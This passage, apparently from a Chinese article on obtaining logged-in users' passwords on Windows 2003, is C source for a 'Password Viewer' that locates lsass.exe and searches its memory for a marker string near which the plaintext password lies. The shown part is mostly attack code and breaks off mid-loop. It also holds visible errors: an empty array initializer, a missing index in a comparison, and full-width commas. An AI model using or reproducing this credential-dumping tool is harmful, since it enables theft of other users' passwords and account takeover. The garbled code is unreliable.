在win 2003中得到登陆用户的密码的三大妙法(2)

　　#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address，Which Causes The Result Unreliable

　　char Password[MAX_PATH] = ; // Store The Found Password

　　// Function ProtoType Declaration

　　//------------------------------------------------------------------------------------------------------

　　BOOL FindPassword(DWORD PID);

　　int Search(char *Buffer，const UINT nSize);

　　DWORD GetLsassPID();

　　BOOL Is2003();

　　//------------------------------------------------------------------------------------------------------

　　// End Of Fucntion ProtoType Declaration

　　int main()

　　{

　　DWORD PID = 0;

　　printf("windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");

　　if (!Is2003()) // Check Out If The Box Is 2003

　　{

　　printf("The Program Can't Only Run On windows 2003 Platform\n");

　　return -1;

　　}

　　PID = GetLsassPID(); // Get The Lsass.exe PID

　　if (PID == 0) // Fail To Get PID If Returning Zerom

　　{

　　return -1;

　　}

　　FindPassword(PID); // Find The Password From Lsass.exe Memory

　　return 0;

　　}

　　// End main()

　　//------------------------------------------------------------------------------------

　　// Purpose: Search The Memory & Try To Get The Password

　　// Return Type: int

　　// Parameters:

　　// In: char *Buffer --> The Memory Buffer To Search

　　// Out: const UINT nSize --> The Size Of The Memory Buffer

　　// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure"，

　　// Since The Password Is Near The Above Location，But It's Not Always True That

　　// We Will Find The Magic String，Or Even We Find It，The Password May Be Located

　　// At Some Other Place.We Only Look For Luck

　　//------------------------------------------------------------------------------------

　　int Search(char *Buffer，const UINT nSize)

　　{

　　UINT OffSet = 0;

　　UINT i = 0;

　　UINT j = 0 ;

　　UINT Count = 0;

　　if (Buffer == NULL)

　　{

　　return -1;

　　}

　　for (i = 0 ; i < nSize ; i++)

　　{

　　/* The Below Is To Find The Magic String，Why So Complicated?That Will Thank MS.The Separation From Word To Word

　　Is Not Separated With A Space，But With A Ending Character，So Any Search API Like strstr() Will Fail To Locate

　　The Magic String，We Have To Do It Manually And Slowly

　　*/

　　if (Buffer == 'L')

　　{

　　OffSet = 0;

　　if (strnicmp(&Buffer[i + OffSet]，"LocalSystem"，strlen("LocalSystem")) == 0)

　　{

　　OffSet += strlen("LocalSystem") + 1;

　　if (strnicmp(&Buffer[i + OffSet]，"Remote"，strlen("Remote")) == 0)

　　{

　　OffSet += strlen("Remote") + 1;

　　if (strnicmp(&Buffer[i + OffSet]，"Procedure"，strlen("Procedure")) == 0)

　　{

　　OffSet += strlen("Procedure") + 1;

　　if (strnicmp(&Buffer[i + OffSet]，"Call"，strlen("Call")) == 0)

　　{

　　i += OffSet;

　　break;

　　}

　　}

　　}

　　}

　　}

　　}

　　if (i < nSize)

　　{

　　ZeroMemory(Password，sizeof(Password));

　　for (; i < nSize ; i++)